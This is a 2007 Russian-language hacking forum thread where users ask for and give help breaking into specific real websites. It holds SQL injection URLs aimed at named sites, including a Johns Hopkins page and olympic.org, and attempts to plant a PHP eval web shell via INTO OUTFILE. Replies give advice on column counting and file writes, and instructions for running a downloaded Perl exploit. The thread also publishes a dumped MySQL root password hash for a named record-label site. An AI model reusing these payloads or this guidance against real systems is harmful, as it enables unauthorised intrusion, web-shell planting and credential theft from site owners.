Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,826
    Likes Received:
    823
    Reputations:
    1,418
    В этой и только в этой теме вы можете задать вопрос про способ заливки шелла, детальные разборки xss и sql на конкретных сайтах, не построенных на паблик движках (для остального есть поиск по форуму).

    Все остальные вновь созданные темы по данным вопросам будут удаляться. Создавайте темы если вы хотите поделиться уязвимостью или нашли что-то новое интересное в публичном двиге и хотите чтобы вам помогли это разобрать.

    Задавать вопросы ответы на которые с легкостью можно найти в многочисленных мануалах и статьях крайне не рекомендуется
     
    #1 darky, 4 Aug 2007
    Last edited by a moderator: 18 Dec 2011
    man474019, _Nika_, Rubaka and 9 others like this.
  2. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    249
    Likes Received:
    258
    Reputations:
    83
    Расскажите про вот такую штуку.
    http://webapps.jhu.edu/needs/detail.cfm?id=1805'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)
    Я вначале подумал что это MSSQL (потому и писал в запросе INFORMATION_SCHEMA.TABLES), а потом посмотрел вроде и не мс, а макромедиа. Короче не понятно мне. Плюс к тому странный выдает ответ - не найду такого-то файла, отсюда вывод что можно грузить файлы баз данных если знаешь имя файла. Но там дописывается расширение автоматом, в связи с этим пробовал %00 - не получилось. Вообщем не все мне ясно с этой базой. Может кто видел такое - поделитесь.
     
    4 people like this.
  3. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,826
    Likes Received:
    823
    Reputations:
    1,418
    Это ColdFusion
    права у твоей небольшие - нет прав на системные таблицы. это видим из
    http://webapps.jhu.edu/needs/detail.cfm?id=1805+union+select+1,2,3,4,5,6,name,8,9,10,11,12,13+from+MSysObjects

    подбирай кол-во столбцов
    http://webapps.jhu.edu/needs/detail.cfm?id=1805+and+1=0+union+select+1,2 ...
    Загвоздка в том что запрос не выполнится пока одновременно не будет подобрано точное кол-во + подставлено в одно из полей правильное название одного из столцов (иначе база считает запрос пустым)
    либо же при наличие прав у юзера (а они часто оставляются по дефолту) выполнять любые запросы в кф базе
    http://webapps.jhu.edu/needs/detail.cfm?id=1805;запрос
     
    2 people like this.
  4. s1mplec0de

    s1mplec0de New Member

    Joined:
    30 Jul 2007
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    brute/shell

    приветствую!

    столкнулся с такой проблемой (

    http://server.com/index.php?id=1 or 1=if(ascii(substring((select%20password%20from%20mysql.user%20where%20user=char(114,111,111,116)),1,1))>=100,1,0)/*

    Error Number: 1242
    Error Message: Subquery returns more than 1 row

    а в случае

    1=if(ascii(substring((select user()),1,1))>=100,1,0)

    все работает нормально, возвращается ответ либо 1 либо 0..... то есть можно перебрать )

    права есть! пасс выглядит так.... 3553f4a3048036eb я просто не в курю почему перебирать не дает...
    ------------------------------------------------------------------
    и вторая проблема..... не могу залить шелл, хотя файл привелегии есть..... лоад_файл работает.....

    http://server.com/index.php?id=1 union select 1,<?php eval($_GET[http://server.com/cmd.php]) ?>,3,4,5,6,7,8 into outfile 1.txt/*


    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ',3,4,5,6,7,8 into outfile 1.txt/*' at line 2

    если <?php eval($_GET[http://server.com/cmd.php]) ?> расписать все через char то начинает ругаться на 1.txt....

    Error Number: 1064
    Error Message: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1.txt/* AND n.status != 'Disabled' ORDER BY date DESC ' at line 2

    уже и так писал и сяк, не получается с этим серваком (((


    версия 5.0.22

    с уважением,
     
    1 person likes this.
  5. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    737
    Likes Received:
    376
    Reputations:
    235
    переведи
    юзай лимит
    хотя странно, почему при where выдается не одна строка... попробуй тупо лимит 0,1 , как правило, рут - первый юзер.

    по поводу второго:

    <?php eval($_GET[http://server.com/cmd.php]) ?>

    это должно быть в кавычках
     
    #5 n1†R0x, 5 Aug 2007
    Last edited: 5 Aug 2007
    1 person likes this.
  6. sharoff

    sharoff Member

    Joined:
    5 Aug 2007
    Messages:
    29
    Likes Received:
    6
    Reputations:
    0
    Если я не ошибаюсь, то загрузка файла через sql происходит путем ... union+select+1,2,3,что будем загружать,5,6..+from+существующая таблица+into+outfile+'/полный/путь/до/директории/для/записи/123.php'/*

    Т.е. вы посто забыли поставить кавычки за прописать полный путь.
     
    1 person likes this.
  7. s1mplec0de

    s1mplec0de New Member

    Joined:
    30 Jul 2007
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    спасибо за советы,

    1. не смог проверить сервак в дауне 8*(**** я понял в чем суть ошибки, просто меня самого смутило что возвращается какой то не однозначный ответ и не 1 и не 0 - поэтому и спрашиваю что за муть....

    2. кавычки фильтруются жестко, по формату знаю.... писал через чар, но не выходит.... ругается ошибкой 1062 кажется..... писал что синтаксическая ' без пути - без ничего.....

    www.server.com/index.php?id=1 union select 1,char(),3,4,5,6,7,8 into outfile или же from table into outfile полный путь или же просто для теста тупо 1.txt/*

    пробовал по всякому, может реально не судьба) поэтому и оставался вариант брута, хз подскажите как правильно запрос написать с лимитом.... where user= ?

    благодарю....
     
  8. sharoff

    sharoff Member

    Joined:
    5 Aug 2007
    Messages:
    29
    Likes Received:
    6
    Reputations:
    0
    При записи +from+table+into+outfile+'/путь/к/папке/для/записи/123.php'/* нужны реальные кавычки, char() здесь не поможет, при фильтрации кавычек эта схема невозможна.
     
  9. Dr.Z3r0

    Dr.Z3r0 Leaders of the World

    Joined:
    6 Jul 2007
    Messages:
    292
    Likes Received:
    594
    Reputations:
    567
    select password from mysql.user where user=char(114,111,111,116) limit 0,1
    Вот это ты имел ввиду?

    Конечно может я не прав но первая мысль у меня возникла что в этой таблице два юзера "root"... Интересно это возможно или нет....
     
    #9 Dr.Z3r0, 6 Aug 2007
    Last edited: 31 May 2011
    1 person likes this.
  10. s1mplec0de

    s1mplec0de New Member

    Joined:
    30 Jul 2007
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    там как не странно но два пользователя с 2-мя одинаковыми пассами....

    limit помог, пасс соответственно как я и писал выше....

    root:3553f4a3048036eb
    touchandgo:3553f4a3048036eb

    http://www.touchandgorecords.com/bands/band.php?id=70%20union%20select%201,concat(USER(),char(58),VERSION(),char(58),DATABASE()),3,4,5,6,7,8/--

    ------

    именно ' там фильтруются, у меня не получилось шелл залить(

    благодарю за помощь, отдельное спасибо Dr.Z3r0 - за статью..... )
     
    #10 s1mplec0de, 7 Aug 2007
    Last edited by a moderator: 31 May 2011
  11. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    249
    Likes Received:
    258
    Reputations:
    83
    Работа с MySQL версии 5.0.27.
    Делаю такой запрос
    Все работает. Как я понимаю выводит название одной из таблиц которые есть в базе.
    Нахожу нужную таблицу через лимит.
    Составляю запрос
    Где 'wifi_points'имя таблицы полученое из предидущего запроса.
    Выводиться имя столбика - "id"
    Дальше пытаюсь вытянуть данные таким запросом
    выдает пустоту так как будто запрос неверный. Пробовал подставлять лимит 1,1 и 0,1 нифига.
    Пробую
    Т.е. проверяю есть ли такая таблица - тоже пусто.
    В итоге могу узнать полностью структуру базы но данные не могу вывести.
    Что не так? Может есть хитрости при работе с MySQL версии 5.0.27.
    Как правильно строить запрос ведь скуль есть, а результата нет?
     
  12. Termin@L

    [email protected] Elder - Старейшина

    Joined:
    7 Dec 2006
    Messages:
    184
    Likes Received:
    43
    Reputations:
    53
    Значит твоему пользователю закрыт доступ, такое тногда бывает, через системные таблицы видишь, а вывести не можешь((((
     
  13. sharoff

    sharoff Member

    Joined:
    5 Aug 2007
    Messages:
    29
    Likes Received:
    6
    Reputations:
    0
    Возможно эта таблица находится в другой базе, можно посмотреть запросом
    Выведет все существующие базы

    и если не ошибаюсь можно выдернуть интересную связку

    Я уверен что в таблице columns есть column_name и table_name, но насчет schema_name не уверен, но по-моему она там была.
     
    1 person likes this.
  14. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    583
    Likes Received:
    205
    Reputations:
    37
    Попробуй
    Code:
    -4+union+select+1111,table _schema,3333,4444,5555,6666 ,7777,8888+from+information_schema.tables+where+table_name='wifi_points'/*.html
     
    2 people like this.
  15. ANT

    ANT New Member

    Joined:
    7 Aug 2007
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте, мне нужна ваша помощь.
    На уязвимой странице происходит передача параметра без фильтрации, он есть особенность- значения полей не выводятся на странице, а на основе данных рисуется карта (это не важно, т.к в базе нет паролей). Я пытаюсь сделать вывод в файл с помощью INTO OUTFILE , но получаю ошибку.
    Я отправляю
    ?id=1122+UNION+SELECT+1,2+FROM+locations+INTO+OUTFILE+'name'
    (OUTFILE я пишу одним словом, без пробела Ж)
    Выдает такое
    Code:
    Warning: mssql_query() [function.mssql-query]: message: Incorrect syntax near the keyword 'INTO'. (severity 15) in E:\XAMPPLITE\htdocs\info\pages\map.php on line 7
    
    Warning: mssql_query() [function.mssql-query]: Query failed in E:\XAMPPLITE\htdocs\info\pages\map.php on line 7
    
    Warning: mssql_fetch_assoc(): supplied argument is not a valid MS SQL-result resource in E:\XAMPPLITE\htdocs\info\pages\map.php on line 8
    А если запрос такой
    ?id=1122+UNION+SELECT+1,2+FROM+locations
    всё нормально, без ошибок

    PHP скрипт там такой
    PHP:
    $result mssql_query("SELECT * 
                           FROM locations
                           WHERE id = 
    $id;");
    Со скриптом возможна неточность (врядли), тк на сервере стоит немного другая версия.

    Всё вроде бы очень просто, но я не пойму что это за неправильный синтаксис возле INTO... Помогите разобраться
     
  16. sharoff

    sharoff Member

    Joined:
    5 Aug 2007
    Messages:
    29
    Likes Received:
    6
    Reputations:
    0
    ээм, а может быть в MSSQL немнога другие запросы поэтому и в into возникает неправильный синтаксис... Все же я не уверен, это всего лишь предположение, за неправильность не бить =)
     
    1 person likes this.
  17. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    583
    Likes Received:
    205
    Reputations:
    37
    http://e-catalog.rusbiz.ru/1'+and+'1'='1.html

    В чем косяк? Запрос вроде правильный, но не проходит. Подозреваю, глюк с плюсами... пробовал /**/, не канает :)
     
  18. infium

    infium New Member

    Joined:
    12 May 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Не знаю правильно ли я выбрал раздел.
    Народ вот есть эксплоит
    MS Windows Explorer.exe Gif Image Denial of Service Exploit
    http://www.milw0rm.com/exploits/4215
    Его вроде компилировать на перле. Но не понел как его использовать. Помоги как его использовать.
     
  19. Taylorith

    Taylorith Elder - Старейшина

    Joined:
    6 Sep 2006
    Messages:
    173
    Likes Received:
    11
    Reputations:
    0
    вот попробовал вбить такое http://www.olympic.org/uk/news/olympic_news/full_story_uk.asp?id=2272' и выдает как видно ошибку ....
    Microsoft VBScript runtime error '800a000d'

    Type mismatch: 'cint'

    /common/asp/inc_news.asp, line 634

    хотя сами могли увидеть.... так вот... что мона сделать дальше?? )) или еще конкретней как заюзать все это... что применить?? ) заранее благодарю... )
     
  20. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    737
    Likes Received:
    376
    Reputations:
    235
    Перл-сплоиты не компилируются, а интерпретируются (выполняются)
    Установи Active Perl (use g00gle 4 searching)
    Далее...
    1. если сплоит с ГУИ (с графич. интерфейс), просто кликни по нему пару раз
    2. если сплоит консольный, запускаешь cmd.exe, переходишь в каталог со сплоитом и запускаешь его, предварительно прочитав в хелпе, за что какой аргумент отвечает.

    пс: данная тема не раз обсуждалась, если все еще непонятно - юзай поиск.
     
Loading...
Thread Status:
Not open for further replies.